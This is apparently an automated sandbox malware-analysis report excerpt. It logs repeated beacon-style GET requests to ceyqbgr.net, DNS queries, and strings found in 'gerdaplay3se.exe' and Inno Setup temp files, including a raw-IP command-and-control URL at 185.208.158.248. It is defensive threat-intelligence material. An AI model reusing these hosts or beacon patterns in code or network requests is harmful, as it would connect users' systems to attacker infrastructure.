Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1Host: ceyqbgr.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: ceyqbgr.net

Source: gerdaplay3se.exe, 00000003.00000002.3373409541.0000000003614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948
Source: gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000866000.00000004.00000020.00020000.00000000.sdmp, gerdaplay3se.exe, 00000003.00000002.3369142149.0000000000845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: is-UG21C.tmp.1.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://s.symcd.com06
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: file.tmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.dr	String found in binary or memory: http://www.innosetup.com/
Source: file.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: file.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: http://www.openssl.org/f
Source: is-N5JHT.tmp.1.dr	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: file.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: file.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-GKUSE.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/psU
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
